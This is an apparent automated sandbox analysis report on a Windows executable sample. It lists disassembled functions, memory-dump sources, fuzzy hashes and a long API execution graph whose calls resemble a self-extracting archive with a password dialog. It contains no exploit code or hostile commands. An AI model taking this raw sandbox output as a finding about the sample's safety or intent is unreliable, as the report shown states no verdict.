                                                                                    Function 00007FF7B8F08870 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide_snwprintf
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 2650857296-834177443
                                                                                    • Opcode ID: b1859d2252e11c54d49d7a22073aada97a6b957ad42f3506c85df0e116246ae7
                                                                                    • Instruction ID: ffd91f59b45ab5326e73773763727760c6eba143fcf426ab500bbb33b0288bb8
                                                                                    • Opcode Fuzzy Hash: b1859d2252e11c54d49d7a22073aada97a6b957ad42f3506c85df0e116246ae7
                                                                                    • Instruction Fuzzy Hash: AB31B672B28A469DEA10AF59D8402E9E3A0FB66B85F841032EF4D1775DDE3CD507C714
                                                                                    Function 00007FF7B8F1FA30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogParamVisibleWindow
                                                                                    • String ID: GETPASSWORD1
                                                                                    • API String ID: 3157717868-3292211884
                                                                                    • Opcode ID: cdbfc7ac07775a66a7f066c24f4f638c9525b18b5cfd08a7c548ee26ef716728
                                                                                    • Instruction ID: 8926b205e82436ebe2f8f986f6647a30a2aa0247ea3509bf3beb1d18027a4de5
                                                                                    • Opcode Fuzzy Hash: cdbfc7ac07775a66a7f066c24f4f638c9525b18b5cfd08a7c548ee26ef716728
                                                                                    • Instruction Fuzzy Hash: 92315175A1868289EA00FF5994111F5E761EB67B86FC80535CB4C0725DCE6CEA46C3A8
                                                                                    Function 00007FF7B8F1960C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryFreeLocal
                                                                                    • String ID: D
                                                                                    • API String ID: 2937684288-2746444292
                                                                                    • Opcode ID: c29b2ebb4104929226f6c927329e7c94920cd71fbbe8f7531bb02443d997119f
                                                                                    • Instruction ID: 698ec45ce43905d4b1b0f47a829661e071d28dc2e0f2b6a073200f65e4704843
                                                                                    • Opcode Fuzzy Hash: c29b2ebb4104929226f6c927329e7c94920cd71fbbe8f7531bb02443d997119f
                                                                                    • Instruction Fuzzy Hash: B4311632B08A428EFB10EFA4D4447EDA3B1EB59749F880135DB4D56948DF7CE24AC794
                                                                                    Function 00007FF7B8F2DA24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID: @
                                                                                    • API String ID: 3000768030-2766056989
                                                                                    • Opcode ID: de4a8b9c40afbc3d723a710c0a019c600529bb3b362c83295f40d36afff3e6c6
                                                                                    • Instruction ID: 386a85f375178d9f5c106ee175c1364a48bbe077bad06de5756b475df5e0caa5
                                                                                    • Opcode Fuzzy Hash: de4a8b9c40afbc3d723a710c0a019c600529bb3b362c83295f40d36afff3e6c6
                                                                                    • Instruction Fuzzy Hash: AB21D332A0C6864CEB60AF2C9490578E651EB66775F680375E76F063DDCE38D487C614
                                                                                    Function 00007FF7B8F23020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B8F21792), ref: 00007FF7B8F23070
                                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B8F21792), ref: 00007FF7B8F230B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                    • String ID: csm
                                                                                    • API String ID: 2573137834-1018135373
                                                                                    • Opcode ID: 68f3dbc6005816547e4d83ef393b177f67aef7054119f2fe87beddd7780f2646
                                                                                    • Instruction ID: 3a1d150d4506cc6ecf1d75213a4cc43b752733f2351c69119f37c6ecf6884407
                                                                                    • Opcode Fuzzy Hash: 68f3dbc6005816547e4d83ef393b177f67aef7054119f2fe87beddd7780f2646
                                                                                    • Instruction Fuzzy Hash: D2115E72618B4082EB20DF19E400269F7E1FB99B99F584234EF8C07B68DF3CC5528B14
                                                                                    Function 00007FF7B8F0E3C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3CB
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1211598281-2248577382
                                                                                    • Opcode ID: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                                                                    • Instruction ID: ee98217762d618408a1f41159df489b068e29972ad4999bc049578acfd4ea041
                                                                                    • Opcode Fuzzy Hash: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                                                                    • Instruction Fuzzy Hash: 2DE04F75E188024AF600BB2DEC859B4E211AFB3336FD00331D23E455ED9F2CA5078329
                                                                                    Function 00007FF7B8F09644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: RTL
                                                                                    • API String ID: 3537982541-834975271
                                                                                    • Opcode ID: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                                                                    • Instruction ID: dea75731a5f899118028f9228865d31895808dc2f253fb36e3c3acdca83e74bc
                                                                                    • Opcode Fuzzy Hash: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                                                                    • Instruction Fuzzy Hash: DDD01261F3564546FF196B799448235D3515B2AB42F880438CA0905368EE6C9185C724

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:2.8%
                                                                                    Total number of Nodes:1481
                                                                                    Total number of Limit Nodes:47
                                                                                    execution_graph 25347 721f72 128 API calls __EH_prolog 25270 73a070 10 API calls 25332 73b270 99 API calls 23424 729a74 23427 729a7e 23424->23427 23425 729b9d SetFilePointer 23426 729bb6 GetLastError 23425->23426 23430 729ab1 23425->23430 23426->23430 23427->23425 23429 729b79 23427->23429 23427->23430 23431 72981a 23427->23431 23429->23425 23432 729833 23431->23432 23435 729e80 23432->23435 23436 729e92 23435->23436 23441 729ea5 23435->23441 23437 729865 23436->23437 23444 726d5b 77 API calls 23436->23444 23437->23429 23438 729eb8 SetFilePointer 23438->23437 23440 729ed4 GetLastError 23438->23440 23440->23437 23442 729ede 23440->23442 23441->23437 23441->23438 23442->23437 23445 726d5b 77 API calls 23442->23445 23444->23441 23445->23437 25272 721075 84 API calls 23446 729f7a 23447 729f88 23446->23447 23448 729f8f 23446->23448 23449 729f9c GetStdHandle 23448->23449 23456 729fab 23448->23456 23449->23456 23450 72a003 WriteFile 23450->23456 23451 729fd4 WriteFile 23452 729fcf 23451->23452 23451->23456 23452->23451 23452->23456 23454 72a095 23458 726e98 77 API calls 23454->23458 23456->23447 23456->23450 23456->23451 23456->23452 23456->23454 23457 726baa 78 API calls 23456->23457 23457->23456 23458->23447 25274 73c793 107 API calls 5 library calls 25349 747f6e 52 API calls 2 library calls 24547 748268 24558 74bb30 24547->24558 24552 748285 24554 748dcc _free 20 API calls 24552->24554 24555 7482ba 24554->24555 24556 748290 24557 748dcc _free 20 API calls 24556->24557 24557->24552 24559 74bb39 24558->24559 24560 74827a 24558->24560 24575 74ba27 24559->24575 24562 74bf30 GetEnvironmentStringsW 24560->24562 24563 74bf9a 24562->24563 24564 74bf47 24562->24564 24565 74bfa3 FreeEnvironmentStringsW 24563->24565 24566 74827f 24563->24566 24567 74bf4d WideCharToMultiByte 24564->24567 24565->24566 24566->24552 24574 7482c0 26 API calls 4 library calls 24566->24574 24567->24563 24568 74bf69 24567->24568 24569 748e06 __vsnwprintf_l 21 API calls 24568->24569 24570 74bf6f 24569->24570 24571 74bf76 WideCharToMultiByte 24570->24571 24572 74bf8c 24570->24572 24571->24572 24573 748dcc _free 20 API calls 24572->24573 24573->24563 24574->24556 24576 7497e5 _abort 38 API calls 24575->24576 24577 74ba34 24576->24577 24595 74bb4e 24577->24595 24579 74ba3c 24604 74b7bb 24579->24604 24582 74ba53 24582->24560 24583 748e06 __vsnwprintf_l 21 API calls 24584 74ba64 24583->24584 24585 74ba96 24584->24585 24611 74bbf0 24584->24611 24587 748dcc _free 20 API calls 24585->24587 24587->24582 24589 74ba91 24621 7491a8 20 API calls __dosmaperr 24589->24621 24591 74bada 24591->24585 24622 74b691 26 API calls 24591->24622 24592 74baae 24592->24591 24593 748dcc _free 20 API calls 24592->24593 24593->24591 24596 74bb5a __FrameHandler3::FrameUnwindToState 24595->24596 24597 7497e5 _abort 38 API calls 24596->24597 24598 74bb64 24597->24598 24601 74bbe8 _abort 24598->24601 24603 748dcc _free 20 API calls 24598->24603 24623 748d24 38 API calls _abort 24598->24623 24624 74ac31 EnterCriticalSection 24598->24624 24625 74bbdf LeaveCriticalSection _abort 24598->24625 24601->24579 24603->24598 24605 744636 __cftof 38 API calls 24604->24605 24606 74b7cd 24605->24606 24607 74b7dc GetOEMCP 24606->24607 24608 74b7ee 24606->24608 24609 74b805 24607->24609 24608->24609 24610 74b7f3 GetACP 24608->24610 24609->24582 24609->24583 24610->24609 24612 74b7bb 40 API calls 24611->24612 24613 74bc0f 24612->24613 24616 74bc60 IsValidCodePage 24613->24616 24618 74bc16 24613->24618 24619 74bc85 __cftof 24613->24619 24614 73fbbc CatchGuardHandler 5 API calls 24615 74ba89 24614->24615 24615->24589 24615->24592 24617 74bc72 GetCPInfo 24616->24617 24616->24618 24617->24618 24617->24619 24618->24614 24626 74b893 GetCPInfo 24619->24626 24621->24585 24622->24585 24624->24598 24625->24598 24627 74b977 24626->24627 24628 74b8cd 24626->24628 24631 73fbbc CatchGuardHandler 5 API calls 24627->24631 24636 74c988 24628->24636 24633 74ba23 24631->24633 24633->24618 24635 74ab78 __vsnwprintf_l 43 API calls 24635->24627 24637 744636 __cftof 38 API calls 24636->24637 24638 74c9a8 MultiByteToWideChar 24637->24638 24640 74c9e6 24638->24640 24648 74ca7e 24638->24648 24642 748e06 __vsnwprintf_l 21 API calls 24640->24642 24645 74ca07 __cftof __vsnwprintf_l 24640->24645 24641 73fbbc CatchGuardHandler 5 API calls 24643 74b92e 24641->24643 24642->24645 24650 74ab78 24643->24650 24644 74ca78 24655 74abc3 20 API calls _free 24644->24655 24645->24644 24647 74ca4c MultiByteToWideChar 24645->24647 24647->24644 24649 74ca68 GetStringTypeW 24647->24649 24648->24641 24649->24644 24651 744636 __cftof 38 API calls 24650->24651 24652 74ab8b 24651->24652 24656 74a95b 24652->24656 24655->24648 24657 74a976 __vsnwprintf_l 24656->24657 24658 74a99c MultiByteToWideChar 24657->24658 24659 74a9c6 24658->24659 24660 74ab50 24658->24660 24663 748e06 __vsnwprintf_l 21 API calls 24659->24663 24665 74a9e7 __vsnwprintf_l 24659->24665 24661 73fbbc CatchGuardHandler 5 API calls 24660->24661 24662 74ab63 24661->24662 24662->24635 24663->24665 24664 74aa30 MultiByteToWideChar 24666 74aa49 24664->24666 24679 74aa9c 24664->24679 24665->24664 24665->24679 24683 74af6c 24666->24683 24670 74aaab 24672 74aacc __vsnwprintf_l 24670->24672 24675 748e06 __vsnwprintf_l 21 API calls 24670->24675 24671 74aa73 24674 74af6c __vsnwprintf_l 11 API calls 24671->24674 24671->24679 24673 74ab41 24672->24673 24676 74af6c __vsnwprintf_l 11 API calls 24672->24676 24691 74abc3 20 API calls _free 24673->24691 24674->24679 24675->24672 24678 74ab20 24676->24678 24678->24673 24680 74ab2f WideCharToMultiByte 24678->24680 24692 74abc3 20 API calls _free 24679->24692 24680->24673 24681 74ab6f 24680->24681 24693 74abc3 20 API calls _free 24681->24693 24684 74ac98 __dosmaperr 5 API calls 24683->24684 24685 74af93 24684->24685 24688 74af9c 24685->24688 24694 74aff4 10 API calls 3 library calls 24685->24694 24687 74afdc LCMapStringW 24687->24688 24689 73fbbc CatchGuardHandler 5 API calls 24688->24689 24690 74aa60 24689->24690 24690->24670 24690->24671 24690->24679 24691->24679 24692->24660 24693->24679 24694->24687 25275 73e455 14 API calls ___delayLoadHelper2@8 24717 73cd58 24718 73ce22 24717->24718 24724 73cd7b _wcschr 24717->24724 24733 73c793 _wcslen _wcsrchr 24718->24733 24745 73d78f 24718->24745 24719 73b314 ExpandEnvironmentStringsW 24719->24733 24721 73d40a 24722 731fbb CompareStringW 24722->24724 24724->24718 24724->24722 24725 73ca67 SetWindowTextW 24725->24733 24728 743e3e 22 API calls 24728->24733 24730 73c855 SetFileAttributesW 24731 73c90f GetFileAttributesW 24730->24731 24743 73c86f __cftof _wcslen 24730->24743 24731->24733 24735 73c921 DeleteFileW 24731->24735 24733->24719 24733->24721 24733->24725 24733->24728 24733->24730 24736 73cc31 GetDlgItem SetWindowTextW SendMessageW 24733->24736 24740 73cc71 SendMessageW 24733->24740 24744 731fbb CompareStringW 24733->24744 24767 73a64d GetCurrentDirectoryW 24733->24767 24769 72a5d1 6 API calls 24733->24769 24770 72a55a FindClose 24733->24770 24771 73b48e 76 API calls 2 library calls 24733->24771 24735->24733 24737 73c932 24735->24737 24736->24733 24738 724092 _swprintf 51 API calls 24737->24738 24739 73c952 GetFileAttributesW 24738->24739 24739->24737 24741 73c967 MoveFileW 24739->24741 24740->24733 24741->24733 24742 73c97f MoveFileExW 24741->24742 24742->24733 24743->24731 24743->24733 24768 72b991 51 API calls 3 library calls 24743->24768 24744->24733 24746 73d799 __cftof _wcslen 24745->24746 24747 73d9c0 24746->24747 24748 73d8a5 24746->24748 24749 73d9e7 24746->24749 24772 731fbb CompareStringW 24746->24772 24747->24749 24752 73d9de ShowWindow 24747->24752 24751 72a231 3 API calls 24748->24751 24749->24733 24753 73d8ba 24751->24753 24752->24749 24759 73d8d1 24753->24759 24773 72b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24753->24773 24755 73d925 24774 73dc3b 6 API calls 24755->24774 24756 73d97b CloseHandle 24757 73d989 24756->24757 24758 73d994 24756->24758 24775 731fbb CompareStringW 24757->24775 24758->24747 24759->24749 24759->24755 24759->24756 24761 73d91b ShowWindow 24759->24761 24761->24755 24763 73d93d 24763->24756 24764 73d950 GetExitCodeProcess 24763->24764 24764->24756 24765 73d963 24764->24765 24765->24756 24767->24733 24768->24743 24769->24733 24770->24733 24771->24733 24772->24748 24773->24759 24774->24763 24775->24758 25276 73a440 GdipCloneImage GdipAlloc 25334 743a40 5 API calls CatchGuardHandler 25350 751f40 CloseHandle 24791 73e44b 24792 73e3f4 24791->24792 24792->24791 24793 73e85d ___delayLoadHelper2@8 14 API calls 24792->24793 24793->24792 25310 73f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25352 73ff30 LocalFree 25279 74c030 GetProcessHeap 25335 73c220 93 API calls _swprintf 25281 74f421 21 API calls __vsnwprintf_l 25282 721025 29 API calls 25311 74b4ae 27 API calls CatchGuardHandler 25355 721710 86 API calls 25312 73ad10 73 API calls 25286 73a400 GdipDisposeImage GdipFree 25336 73d600 70 API calls 25287 746000 QueryPerformanceFrequency QueryPerformanceCounter 25315 742900 6 API calls 4 library calls 25337 74f200 51 API calls 25357 74a700 21 API calls 25318 7295f0 80 API calls 25319 73fd4f 9 API calls 2 library calls 25338 725ef0 82 API calls 23370 7498f0 23378 74adaf 23370->23378 23373 749904 23375 74990c 23376 749919 23375->23376 23386 749920 11 API calls 23375->23386 23387 74ac98 23378->23387 23381 74adee TlsAlloc 23384 74addf 23381->23384 23383 7498fa 23383->23373 23385 749869 20 API calls 2 library calls 23383->23385 23394 73fbbc 23384->23394 23385->23375 23386->23373 23388 74acc8 23387->23388 23392 74acc4 23387->23392 23388->23381 23388->23384 23389 74ace8 23389->23388 23391 74acf4 GetProcAddress 23389->23391 23393 74ad04 __dosmaperr 23391->23393 23392->23388 23392->23389 23401 74ad34 23392->23401 23393->23388 23395 73fbc5 IsProcessorFeaturePresent 23394->23395 23396 73fbc4 23394->23396 23398 73fc07 23395->23398 23396->23383 23408 73fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23398->23408 23400 73fcea 23400->23383 23402 74ad55 LoadLibraryExW 23401->23402 23407 74ad4a 23401->23407 23403 74ad72 GetLastError 23402->23403 23406 74ad8a 23402->23406 23405 74ad7d LoadLibraryExW 23403->23405 23403->23406 23404 74ada1 FreeLibrary 23404->23407 23405->23406 23406->23404 23406->23407 23407->23392 23408->23400 23409 74abf0 23411 74abfb 23409->23411 23412 74ac24 23411->23412 23413 74ac20 23411->23413 23415 74af0a 23411->23415 23422 74ac50 DeleteCriticalSection 23412->23422 23416 74ac98 __dosmaperr 5 API calls 23415->23416 23417 74af31 23416->23417 23418 74af4f InitializeCriticalSectionAndSpinCount 23417->23418 23419 74af3a 23417->23419 23418->23419 23420 73fbbc CatchGuardHandler 5 API calls 23419->23420 23421 74af66 23420->23421 23421->23411 23422->23413 25289 7488f0 7 API calls ___scrt_uninitialize_crt 25291 742cfb 38 API calls 4 library calls 23460 73b7e0 23461 73b7ea __EH_prolog 23460->23461 23626 721316 23461->23626 23464 73b841 23465 73b82a 23465->23464 23468 73b89b 23465->23468 23469 73b838 23465->23469 23466 73bf0f 23705 73d69e 23466->23705 23475 73b92e GetDlgItemTextW 23468->23475 23476 73b8b1 23468->23476 23471 73b878 23469->23471 23472 73b83c 23469->23472 23471->23464 23483 73b95f KiUserCallbackDispatcher 23471->23483 23472->23464 23481 72e617 53 API calls 23472->23481 23473 73bf2a SendMessageW 23474 73bf38 23473->23474 23477 73bf52 GetDlgItem SendMessageW 23474->23477 23478 73bf41 SendDlgItemMessageW 23474->23478 23475->23471 23479 73b96b 23475->23479 23480 72e617 53 API calls 23476->23480 23723 73a64d GetCurrentDirectoryW 23477->23723 23478->23477 23484 73b980 GetDlgItem 23479->23484 23624 73b974 23479->23624 23487 73b8ce SetDlgItemTextW 23480->23487 23488 73b85b 23481->23488 23483->23464 23485 73b9b7 SetFocus 23484->23485 23486 73b994 SendMessageW SendMessageW 23484->23486 23490 73b9c7 23485->23490 23506 73b9e0 23485->23506 23486->23485 23491 73b8d9 23487->23491 23745 72124f SHGetMalloc 23488->23745 23489 73bf82 GetDlgItem 23493 73bfa5 SetWindowTextW 23489->23493 23494 73bf9f 23489->23494 23495 72e617 53 API calls 23490->23495 23491->23464 23500 73b8e6 GetMessageW 23491->23500 23724 73abab GetClassNameW 23493->23724 23494->23493 23501 73b9d1 23495->23501 23496 73b862 23496->23464 23507 73c1fc SetDlgItemTextW 23496->23507 23497 73be55 23502 72e617 53 API calls 23497->23502 23500->23464 23504 73b8fd IsDialogMessageW 23500->23504 23746 73d4d4 23501->23746 23508 73be65 SetDlgItemTextW 23502->23508 23504->23491 23510 73b90c TranslateMessage DispatchMessageW 23504->23510 23511 72e617 53 API calls 23506->23511 23507->23464 23509 73be79 23508->23509 23512 72e617 53 API calls 23509->23512 23510->23491 23516 73ba17 23511->23516 23550 73be9c _wcslen 23512->23550 23513 73b9d9 23636 72a0b1 23513->23636 23515 73bff0 23519 73c020 23515->23519 23523 72e617 53 API calls 23515->23523 23520 724092 _swprintf 51 API calls 23516->23520 23518 73c73f 97 API calls 23518->23515 23529 73c73f 97 API calls 23519->23529 23580 73c0d8 23519->23580 23521 73ba29 23520->23521 23524 73d4d4 16 API calls 23521->23524 23528 73c003 SetDlgItemTextW 23523->23528 23524->23513 23525 73c18b 23531 73c194 EnableWindow 23525->23531 23532 73c19d 23525->23532 23526 73ba73 23642 73ac04 SetCurrentDirectoryW 23526->23642 23527 73ba68 GetLastError 23527->23526 23534 72e617 53 API calls 23528->23534 23530 73c03b 23529->23530 23540 73c04d 23530->23540 23572 73c072 23530->23572 23531->23532 23537 73c1ba 23532->23537 23764 7212d3 GetDlgItem EnableWindow 23532->23764 23533 73beed 23536 72e617 53 API calls 23533->23536 23538 73c017 SetDlgItemTextW 23534->23538 23536->23464 23543 73c1e1 23537->23543 23558 73c1d9 SendMessageW 23537->23558 23538->23519 23539 73ba87 23544 73ba9e 23539->23544 23545 73ba90 GetLastError 23539->23545 23762 739ed5 32 API calls 23540->23762 23541 73c0cb 23546 73c73f 97 API calls 23541->23546 23543->23464 23553 72e617 53 API calls 23543->23553 23547 73bb11 23544->23547 23551 73bb20 23544->23551 23552 73baae GetTickCount 23544->23552 23545->23544 23546->23580 23547->23551 23555 73bd56 23547->23555 23549 73c1b0 23765 7212d3 GetDlgItem EnableWindow 23549->23765 23550->23533 23554 72e617 53 API calls 23550->23554 23562 73bcfb 23551->23562 23563 73bcf1 23551->23563 23564 73bb39 GetModuleFileNameW 23551->23564 23643 724092 23552->23643 23553->23496 23561 73bed0 23554->23561 23661 7212f1 GetDlgItem ShowWindow 23555->23661 23556 73c066 23556->23572 23558->23543 23568 724092 _swprintf 51 API calls 23561->23568 23571 72e617 53 API calls 23562->23571 23563->23471 23563->23562 23756 72f28c 82 API calls 23564->23756 23565 73c169 23763 739ed5 32 API calls 23565->23763 23566 73bd66 23662 7212f1 GetDlgItem ShowWindow 23566->23662 23567 73bac7 23646 72966e 23567->23646 23568->23533 23577 73bd05 23571->23577 23572->23541 23578 73c73f 97 API calls 23572->23578 23574 72e617 53 API calls 23574->23580 23575 73bb5f 23581 724092 _swprintf 51 API calls 23575->23581 23576 73c188 23576->23525 23582 724092 _swprintf 51 API calls 23577->23582 23583 73c0a0 23578->23583 23579 73bd70 23663 72e617 23579->23663 23580->23525 23580->23565 23580->23574 23586 73bb81 CreateFileMappingW 23581->23586 23587 73bd23 23582->23587 23583->23541 23588 73c0a9 DialogBoxParamW 23583->23588 23591 73bbe3 GetCommandLineW 23586->23591 23619 73bc60 __InternalCxxFrameHandler 23586->23619 23599 72e617 53 API calls 23587->23599 23588->23471 23588->23541 23590 73baed 23593 73baff 23590->23593 23594 73baf4 GetLastError 23590->23594 23595 73bbf4 23591->23595 23654 72959a 23593->23654 23594->23593 23757 73b425 SHGetMalloc 23595->23757 23596 73bd8c SetDlgItemTextW GetDlgItem 23600 73bdc1 23596->23600 23601 73bda9 GetWindowLongW SetWindowLongW 23596->23601 23603 73bd3d 23599->23603 23668 73c73f 23600->23668 23601->23600 23602 73bc10 23758 73b425 